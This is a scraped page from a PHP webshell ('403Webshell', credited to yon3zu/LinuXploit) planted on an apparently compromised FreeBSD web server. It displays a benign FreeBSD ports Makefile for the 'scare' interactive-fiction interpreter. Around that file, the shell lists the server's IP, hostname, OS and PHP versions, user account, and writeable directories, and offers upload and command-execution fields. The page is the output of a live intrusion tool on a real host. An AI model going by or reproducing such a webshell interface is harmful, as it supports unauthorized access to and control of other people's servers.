403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/games/scare/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/games/scare/Makefile
PORTNAME=	scare
PORTVERSION=	1.3.10
CATEGORIES=	games
MASTER_SITES=	http://ifarchive.flavorplex.com/%SUBDIR%/ \
		http://ifarchive.heanet.ie/%SUBDIR%/ \
		http://ifarchive.jmac.org/%SUBDIR%/ \
		http://ifarchive.plover.net/%SUBDIR%/ \
		http://ifarchive.wurb.com/%SUBDIR%/ \
		http://www.ifarchive.org/%SUBDIR%/ \
		ftp://ftp.ifarchive.org/%SUBDIR%/
MASTER_SITE_SUBDIR=	if-archive/programming/adrift

MAINTAINER=	ports@FreeBSD.org
COMMENT=	ADRIFT-compatible interactive games interpreter
WWW=		http://sites.google.com/site/scarehome/

LICENSE=	GPLv2

OPTIONS_DEFINE=	XGLK
XGLK_DESC=	Use the xglk graphics library

USES=		zip

PLIST_FILES=	bin/scare

XGLK_BUILD_DEPENDS=	${LOCALBASE}/lib/libxglk.a:games/xglk
XGLK_RUN_DEPENDS=	${LOCALBASE}/lib/libxglk.a:games/xglk
XGLK_ALL_TARGET=	scare glkscare
XGLK_PLIST_FILES=	bin/glkscare

.include <bsd.port.options.mk>

post-patch:
	@${REINPLACE_CMD} -e \
		'/^CC/s|= |?= | ; \
		 /^CFLAGS/s|= -O2|+= | ; \
		 /^CFLAGS/s|-fPIC|| ; \
		 /^LDLIBS/s|=.*|= -lz| ; \
		 /-D__unix/s|^#|| ; \
		 s|^sinclude.*|.include "$$(GLKPATH)/Make.$$(GLK)"| ; \
		 s| $$(ZOBJECTS)||' ${WRKSRC}/source/Makefile

do-configure:
	@${MKDIR} ${WRKDIR}/xglk
.if ${PORT_OPTIONS:MXGLK}
	@${LN} -sf ${LOCALBASE}/include/xglk/*.h ${WRKDIR}/xglk
	@${LN} -sf ${LOCALBASE}/share/xglk/Make.xglk ${WRKDIR}/xglk
.else
	@${TOUCH} ${WRKDIR}/xglk/Make.xglk
.endif

do-install:
	${INSTALL_PROGRAM} ${WRKSRC}/source/scare ${STAGEDIR}${PREFIX}/bin
.if ${PORT_OPTIONS:MXGLK}
	${INSTALL_PROGRAM} ${WRKSRC}/source/glkscare ${STAGEDIR}${PREFIX}/bin
.endif

test:	build
	@cd ${WRKSRC} && ${SETENV} ${MAKE_ENV} ${MAKE} ${MAKE_FLAGS} \
		${MAKEFILE} ${MAKE_ARGS} check

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit